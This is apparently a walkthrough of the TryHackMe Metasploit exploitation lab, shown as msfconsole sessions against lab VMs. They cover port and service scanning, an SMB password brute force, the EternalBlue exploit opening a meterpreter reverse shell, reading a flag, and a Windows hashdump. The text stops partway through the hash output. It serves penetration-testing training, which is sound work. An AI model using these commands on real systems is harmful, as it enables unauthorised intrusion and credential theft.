Home Metasploit - Exploitation
Post
Cancel

Metasploit - Exploitation

THM Room https://tryhackme.com/room/metasploitexploitation

TASK 1 : Introduction

Start the AttackBox and run Metasploit using the msfconsole command to follow along this room.

No Answer

TASK 2 : Scanning

How many ports are open on the target system ?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
root@ip-10-10-196-135:~/Desktop/msexploit# msfconsole
[...]

msf5 > search portscan

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/wordpress_pingback_access                   normal  No     Wordpress Pingback Locator
   1  auxiliary/scanner/natpmp/natpmp_portscan                           normal  No     NAT-PMP External Port Scanner
   2  auxiliary/scanner/portscan/ack                                     normal  No     TCP ACK Firewall Scanner
   3  auxiliary/scanner/portscan/ftpbounce                               normal  No     FTP Bounce Port Scanner
   4  auxiliary/scanner/portscan/syn                                     normal  No     TCP SYN Port Scanner
   5  auxiliary/scanner/portscan/tcp                                     normal  No     TCP Port Scanner
   6  auxiliary/scanner/portscan/xmas                                    normal  No     TCP "XMas" Port Scanner
   7  auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner


Interact with a module by name or index, for example use 7 or use auxiliary/scanner/sap/sap_router_portscanner

msf5 > use 5
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.10.33.77
RHOSTS => 10.10.33.77
msf5 auxiliary(scanner/portscan/tcp) > run

[+] 10.10.33.77:          - 10.10.33.77:21 - TCP OPEN
[+] 10.10.33.77:          - 10.10.33.77:22 - TCP OPEN
[+] 10.10.33.77:          - 10.10.33.77:139 - TCP OPEN
[+] 10.10.33.77:          - 10.10.33.77:445 - TCP OPEN
[+] 10.10.33.77:          - 10.10.33.77:8000 - TCP OPEN
[*] 10.10.33.77:          - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We found 5 TCP open ports. Answer : 5

Using the relevant scanner, what NetBIOS name can you see ?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
msf5 auxiliary(scanner/portscan/tcp) > back
msf5 > search netbios

Matching Modules
================

   #  Name                                          Disclosure Date  Rank    Check  Description
   -  ----                                          ---------------  ----    -----  -----------
   0  auxiliary/admin/netbios/netbios_spoof                          normal  No     NetBIOS Response Brute Force Spoof (Direct)
   1  auxiliary/dos/smb/smb_loris                   2017-06-29       normal  No     SMBLoris NBSS Denial of Service
   2  auxiliary/scanner/http/ntlm_info_enumeration                   normal  No     Host Information Enumeration via NTLM Authentication
   3  auxiliary/scanner/netbios/nbname                               normal  No     NetBIOS Information Discovery
   4  auxiliary/server/netbios_spoof_nat            2016-06-14       normal  No     NetBIOS Response "BadTunnel" Brute Force Spoof (NAT Tunnel)
   5  auxiliary/server/wpad                                          normal  No     WPAD.dat File Server
   6  auxiliary/spoof/llmnr/llmnr_response                           normal  No     LLMNR Spoofer
   7  auxiliary/spoof/nbns/nbns_response                             normal  No     NetBIOS Name Service Spoofer


Interact with a module by name or index, for example use 7 or use auxiliary/spoof/nbns/nbns_response

msf5 > use 3
msf5 auxiliary(scanner/netbios/nbname) > show options

Module options (auxiliary/scanner/netbios/nbname):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      137              yes       The target port (UDP)
   THREADS    10               yes       The number of concurrent threads

msf5 auxiliary(scanner/netbios/nbname) > set RHOSTS 10.10.33.77
RHOSTS => 10.10.33.77
msf5 auxiliary(scanner/netbios/nbname) > run

[*] Sending NetBIOS requests to 10.10.33.77->10.10.33.77 (1 hosts)
[+] 10.10.33.77 [IP-10-10-33-77] OS:Unix Names:(IP-10-10-33-77, __MSBROWSE__, ACME IT SUPPORT) Addresses:(10.10.33.77) Mac:00:00:00:00:00:00 
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Answer : ACME IT SUPPORT

What is running on port 8000 ?

For answering this question, i ran nmap to have the service running on port 8000 then use module scanner/http_version :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
msf5 auxiliary(scanner/netbios/nbname) > back
msf5 > nmap -sS 10.10.33.77
[*] exec: nmap -sS 10.10.33.77


Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-26 08:39 BST
Nmap scan report for ip-10-10-33-77.eu-west-1.compute.internal (10.10.33.77)
Host is up (0.0014s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8000/tcp open  http-alt
MAC Address: 02:E9:BA:38:47:59 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.70 seconds
msf5 > search http_version

Matching Modules
================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/http_version                   normal  No     HTTP Version Detection

msf5 > use 0
msf5 auxiliary(scanner/http/http_version) > show options

Module options (auxiliary/scanner/http/http_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   THREADS  1                yes       The number of concurrent threads (max one per host)
   VHOST                     no        HTTP server virtual host

msf5 auxiliary(scanner/http/http_version) > setg RHOSTS 10.10.33.77
RHOSTS => 10.10.33.77
msf5 auxiliary(scanner/http/http_version) > set RPORT 8000
RPORT => 8000
msf5 auxiliary(scanner/http/http_version) > run

[+] 10.10.33.77:8000 webfs/1.21 ( 403-Forbidden )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Answer : webfs/1.21

What is the “penny” user’s SMB password? Use the wordlist mentioned in the previous task.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
msf5 auxiliary(scanner/http/http_version) > back
msf5 > search scanner/smb

Matching Modules
================

   #   Name                                         Disclosure Date  Rank    Check  Description
   -   ----                                         ---------------  ----    -----  -----------
   0   auxiliary/scanner/smb/impacket/dcomexec      2018-03-19       normal  No     DCOM Exec
   1   auxiliary/scanner/smb/impacket/secretsdump                    normal  No     DCOM Exec
   2   auxiliary/scanner/smb/impacket/wmiexec       2018-03-19       normal  No     WMI Exec
   3   auxiliary/scanner/smb/pipe_auditor                            normal  No     SMB Session Pipe Auditor
   4   auxiliary/scanner/smb/pipe_dcerpc_auditor                     normal  No     SMB Session Pipe DCERPC Auditor
   5   auxiliary/scanner/smb/psexec_loggedin_users                   normal  No     Microsoft Windows Authenticated Logged In Users Enumeration
   6   auxiliary/scanner/smb/smb1                                    normal  No     SMBv1 Protocol Detection
   7   auxiliary/scanner/smb/smb2                                    normal  No     SMB 2.0 Protocol Detection
   8   auxiliary/scanner/smb/smb_enum_gpp                            normal  No     SMB Group Policy Preference Saved Passwords Enumeration
   9   auxiliary/scanner/smb/smb_enumshares                          normal  No     SMB Share Enumeration
   10  auxiliary/scanner/smb/smb_enumusers                           normal  No     SMB User Enumeration (SAM EnumUsers)
   11  auxiliary/scanner/smb/smb_enumusers_domain                    normal  No     SMB Domain User Enumeration
   12  auxiliary/scanner/smb/smb_login                               normal  No     SMB Login Check Scanner
   13  auxiliary/scanner/smb/smb_lookupsid                           normal  No     SMB SID User Enumeration (LookupSid)
   14  auxiliary/scanner/smb/smb_ms17_010                            normal  No     MS17-010 SMB RCE Detection
   15  auxiliary/scanner/smb/smb_uninit_cred                         normal  Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State
   16  auxiliary/scanner/smb/smb_version                             normal  No     SMB Version Detection


Interact with a module by name or index, for example use 16 or use auxiliary/scanner/smb/smb_version

msf5 > use 12
msf5 auxiliary(scanner/smb/smb_login) > show options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS             10.10.33.77      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE                           no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts

msf5 auxiliary(scanner/smb/smb_login) > set SMBUser penny
SMBUser => penny
msf5 auxiliary(scanner/smb/smb_login) > ls
[*] exec: ls

MetasploitWordlist.txt
msf5 auxiliary(scanner/smb/smb_login) > set DB_ALL_PASS true
DB_ALL_PASS => true
msf5 auxiliary(scanner/smb/smb_login) > set PASS_FILE MetasploitWordlist.txt
PASS_FILE => MetasploitWordlist.txt
msf5 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.33.77:445       - 10.10.33.77:445 - Starting SMB login bruteforce
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:95',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:98',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:2003',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:2008',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:111111',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:123456',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:12345678',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:1qaz2wsx',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:abc',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:abc123',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:abcd123',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:account',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:admin',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:adminadmin',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:administator',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:admins',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:air',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:alpine',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:Autumn2013',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:autumn2013',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:Autumn2014',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:autumn2014',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:Autumn2015',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:autumn2015',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:Autumn2016',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:autumn2016',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:Autumn2017',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:autumn2017',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:bankbank',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:baseball',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:basketball',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:bird',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:burp',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:change',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:changelater',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:changeme',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:company',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:company!',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:company1',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:company1!',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:company123',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:complex',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:complex1',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:complex2',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:complex3',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:complexpassword',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:database',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:default',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:dev',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:devdev',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:devdevdev',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:dirt',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:dragon',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:earth',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:fire',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:football',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:goat',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:goat',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:god',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:guessme',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:hugs',
[-] 10.10.33.77:445       - 10.10.33.77:445 - Failed: '.\penny:letmein',
[+] 10.10.33.77:445       - 10.10.33.77:445 - Success: '.\penny:leo1234'
[*] 10.10.33.77:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Answer : leo1234

TASK 3 : The Metasploit Database

No answers needed.

No Anwser

TASK 4 : Vulnerability Scanning

Who wrote the module that allows us to check SMTP servers for open relay ?

Let’s again search keywords like SMTP, smtp_server, relay. The last one give me what i want :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
msf5 > search relay

Matching Modules
================

   #   Name                                                            Disclosure Date  Rank       Check  Description
   -   ----                                                            ---------------  ----       -----  -----------
   0   auxiliary/admin/mssql/mssql_ntlm_stealer                                         normal     No     Microsoft SQL Server NTLM Stealer
   1   auxiliary/admin/mssql/mssql_ntlm_stealer_sqli                                    normal     No     Microsoft SQL Server SQLi NTLM Stealer
   2   auxiliary/admin/oracle/ora_ntlm_stealer                         2009-04-07       normal     No     Oracle SMB Relay Code Execution
   3   auxiliary/gather/ibm_bigfix_sites_packages_enum                 2019-03-18       normal     No     IBM BigFix Relay Server Sites and Package Enum
   4   auxiliary/scanner/http/exchange_web_server_pushsubscription     2019-01-21       normal     No     Microsoft Exchange Privilege Escalation Exploit
   5   auxiliary/scanner/sap/sap_smb_relay                                              normal     No     SAP SMB Relay Abuse
   6   auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence                   normal     No     SAP SOAP RFC PFL_CHECK_OS_FILE_EXISTENCE File Existence Check
   7   auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir                                  normal     No     SAP SOAP RFC RZL_READ_DIR_LOCAL Directory Contents Listing
   8   auxiliary/scanner/smtp/smtp_relay                                                normal     No     SMTP Open Relay Detection
   9   auxiliary/server/http_ntlmrelay                                                  normal     No     HTTP Client MS Credential Relayer
   10  auxiliary/server/socks4a                                                         normal     No     Socks4a Proxy Server
   11  auxiliary/server/socks5                                                          normal     No     Socks5 Proxy Server
   12  exploit/multi/http/october_upload_bypass_exec                   2017-04-25       excellent  Yes    October CMS Upload Protection Bypass Code Execution
   13  exploit/multi/http/vtiger_logo_upload_exec                      2015-09-28       excellent  Yes    Vtiger CRM - Authenticated Logo Upload RCE
   14  exploit/windows/browser/ms13_009_ie_slayoutrun_uaf              2013-02-13       average    No     MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free
   15  exploit/windows/smb/smb_relay                                   2001-03-31       excellent  No     MS08-068 Microsoft Windows SMB Relay Code Execution
   16  post/multi/manage/screenshare                                                    normal     No     Multi Manage the screen of the target meterpreter session


Interact with a module by name or index, for example use 16 or use post/multi/manage/screenshare

msf5 > use 8
msf5 auxiliary(scanner/smtp/smtp_relay) > info

       Name: SMTP Open Relay Detection
     Module: auxiliary/scanner/smtp/smtp_relay
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Campbell Murray
  xistence <xistence@0x90.nl>

Check supported:
  No

Basic options:
  Name      Current Setting     Required  Description
  ----      ---------------     --------  -----------
  EXTENDED  false               yes       Do all the 16 extended checks
  MAILFROM  sender@example.com  yes       FROM address of the e-mail
  MAILTO    target@example.com  yes       TO address of the e-mail
  RHOSTS    10.10.33.77         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     25                  yes       The target port (TCP)
  THREADS   1                   yes       The number of concurrent threads (max one per host)

Description:
  This module tests if an SMTP server will accept (via a code 250) an 
  e-mail by using a variation of testing methods. Some of the extended 
  methods will try to abuse configuration or mailserver flaws.

References:
  http://www.ietf.org/rfc/rfc2821.txt
  https://svn.nmap.org/nmap/scripts/smtp-open-relay.nse

Answer : Campbell Murray

TASK 5 : Exploitation

Exploit one of the critical vulnerabilities on the target VM.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
msf5 > setg RHOSTS 10.10.215.124
RHOSTS => 10.10.215.124
msf5 > search eternalblue

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index, for example use 4 or use exploit/windows/smb/smb_doublepulsar_rce

msf5 > use 2
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.10.196.135:4444 
[*] 10.10.215.124:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.215.124:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.215.124:445     - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.215.124:445 - Connecting to target for exploitation.
[+] 10.10.215.124:445 - Connection established for exploitation.
[+] 10.10.215.124:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.215.124:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.215.124:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.215.124:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.215.124:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.215.124:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.215.124:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.215.124:445 - Sending all but last fragment of exploit packet
[*] 10.10.215.124:445 - Starting non-paged pool grooming
[+] 10.10.215.124:445 - Sending SMBv2 buffers
[+] 10.10.215.124:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.215.124:445 - Sending final SMBv2 buffers.
[*] 10.10.215.124:445 - Sending last fragment of exploit packet!
[*] 10.10.215.124:445 - Receiving response from exploit packet
[+] 10.10.215.124:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.215.124:445 - Sending egg to corrupted connection.
[*] 10.10.215.124:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 10.10.215.124
[*] Meterpreter session 2 opened (10.10.196.135:4444 -> 10.10.215.124:49189) at 2021-09-26 09:39:36 +0100
[+] 10.10.215.124:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.215.124:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.215.124:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

No Answer

What is the content of the flag.txt file ?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
meterpreter > shell
C:\Windows\system32>cd /Users
cd /Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E611-0B66

 Directory of C:\Users

12/12/2018  10:13 PM    <DIR>          .
12/12/2018  10:13 PM    <DIR>          ..
12/12/2018  10:13 PM    <DIR>          Jon
04/12/2011  03:28 AM    <DIR>          Public
               0 File(s)              0 bytes
               4 Dir(s)  39,938,625,536 bytes free

C:\Users>cd Jon/Desktop
cd Jon

C:\Users\Jon\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E611-0B66

 Directory of C:\Users\Jon\Desktop

12/12/2018  10:49 PM    <DIR>          .
12/12/2018  10:49 PM    <DIR>          ..
               0 File(s)              0 bytes
               2 Dir(s)  39,938,625,536 bytes free

C:\Users\Jon\Desktop>cd ..
cd ..

C:\Users\Jon>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E611-0B66

 Directory of C:\Users\Jon

12/12/2018  10:13 PM    <DIR>          .
12/12/2018  10:13 PM    <DIR>          ..
12/12/2018  10:13 PM    <DIR>          Contacts
12/12/2018  10:49 PM    <DIR>          Desktop
07/14/2021  09:39 PM    <DIR>          Documents
12/12/2018  10:13 PM    <DIR>          Downloads
12/12/2018  10:13 PM    <DIR>          Favorites
12/12/2018  10:13 PM    <DIR>          Links
12/12/2018  10:13 PM    <DIR>          Music
12/12/2018  10:13 PM    <DIR>          Pictures
12/12/2018  10:13 PM    <DIR>          Saved Games
12/12/2018  10:13 PM    <DIR>          Searches
12/12/2018  10:13 PM    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  39,938,625,536 bytes free

C:\Users\Jon>cd Documents
cd Documents

C:\Users\Jon\Documents>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E611-0B66

 Directory of C:\Users\Jon\Documents

07/14/2021  09:39 PM    <DIR>          .
07/14/2021  09:39 PM    <DIR>          ..
07/14/2021  09:39 PM                15 flag.txt
               1 File(s)             15 bytes
               2 Dir(s)  39,938,625,536 bytes free

C:\Users\Jon\Documents>type flag.txt
type flag.txt
THM-5455554845

You can also try the search command in the meterpreter :

1
2
3
4

meterpreter > search -f "flag.txt"
Found 1 result...
    c:\Users\Jon\Documents\flag.txt (15 bytes)

Answer : THM-5455554845

What is the NTLM hash of the password of the user “pirate”?

We need to dump the hash of a user. For this, i’ll background my meterpreter session then search for a hashdump with metasploit :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
C:\Windows\system32>exit
exit
meterpreter > 
Background session 2? [y/N]  
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-PC  10.10.196.135:4444 -> 10.10.215.124:49189 (10.10.215.124)

msf5 exploit(windows/smb/ms17_010_eternalblue) > back
msf5 > search hashdump

Matching Modules
================

   #   Name                                                  Disclosure Date  Rank    Check  Description
   -   ----                                                  ---------------  ----    -----  -----------
   0   auxiliary/analyze/crack_databases                                      normal  No     Password Cracker: Databases
   1   auxiliary/scanner/mssql/mssql_hashdump                                 normal  No     MSSQL Password Hashdump
   2   auxiliary/scanner/mysql/mysql_authbypass_hashdump     2012-06-09       normal  No     MySQL Authentication Bypass Password Dump
   3   auxiliary/scanner/mysql/mysql_hashdump                                 normal  No     MYSQL Password Hashdump
   4   auxiliary/scanner/oracle/oracle_hashdump                               normal  No     Oracle Password Hashdump
   5   auxiliary/scanner/postgres/postgres_hashdump                           normal  No     Postgres Password Hashdump
   6   auxiliary/scanner/smb/impacket/secretsdump                             normal  No     DCOM Exec
   7   post/aix/hashdump                                                      normal  No     AIX Gather Dump Password Hashes
   8   post/android/gather/hashdump                                           normal  No     Android Gather Dump Password Hashes for Android Systems
   9   post/bsd/gather/hashdump                                               normal  No     BSD Dump Password Hashes
   10  post/linux/gather/hashdump                                             normal  No     Linux Gather Dump Password Hashes for Linux Systems
   11  post/osx/gather/hashdump                                               normal  No     OS X Gather Mac OS X Password Hash Collector
   12  post/solaris/gather/hashdump                                           normal  No     Solaris Gather Dump Password Hashes for Solaris Systems
   13  post/windows/gather/credentials/domain_hashdump                        normal  No     Windows Domain Controller Hashdump
   14  post/windows/gather/credentials/mcafee_vse_hashdump                    normal  No     McAfee Virus Scan Enterprise Password Hashes Dump
   15  post/windows/gather/credentials/mssql_local_hashdump                   normal  No     Windows Gather Local SQL Server Hash Dump
   16  post/windows/gather/hashdump                                           normal  No     Windows Gather Local User Account Password Hashes (Registry)
   17  post/windows/gather/smart_hashdump                                     normal  No     Windows Gather Local and Domain Controller Account Password Hashes


Interact with a module by name or index, for example use 17 or use post/windows/gather/smart_hashdump

msf5 > use 16
msf5 post(windows/gather/hashdump) > show options

Module options (post/windows/gather/hashdump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf5 post(windows/gather/hashdump) > set SESSION 2
SESSION => 2
msf5 post(windows/gather/hashdump) > show options

Module options (post/windows/gather/hashdump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  2                yes       The session to run this module on.

msf5 post(windows/gather/hashdump) > run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 55bd17830e678f18a3110daf2c17d4c7...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
